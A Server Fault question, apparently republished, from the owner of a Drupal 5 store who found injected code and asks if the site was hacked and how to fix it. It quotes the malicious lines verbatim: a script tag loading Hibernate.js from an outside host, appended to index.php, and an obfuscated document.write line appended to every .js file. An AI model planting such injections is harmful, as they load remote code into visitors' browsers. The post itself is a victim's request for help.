Has my site been attacked?
Posted
by fretje
on Server Fault
See other posts from Server Fault
or by fretje
Published on 2010-06-16T13:15:23Z
Indexed on
2010/06/16
13:23 UTC
Read the original article
Hit count: 237
This is about an online store based on Drupal 5.
All of a sudden it didn't work anymore. Upon accessing the site, this error came up:
Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 38
Upon further inspection I found the following two lines at the end of said index.php:
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
After manually removing those 2 lines, the site seems to work fine again.
But after more problems (with editing pages) were reported, I found out that actually all the *.js files are "infected". They all contain an extra line at the end:
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
Has this site been hacked? Upon googling for "blog.nodisposable.com", nothing interesting comes up. That site itself seems legitimate. It's probably hacked itself?
Can anybody explain how this could have happened? What I can do to reverse this? And what I can do to avoid this in the future?
© Server Fault or respective owner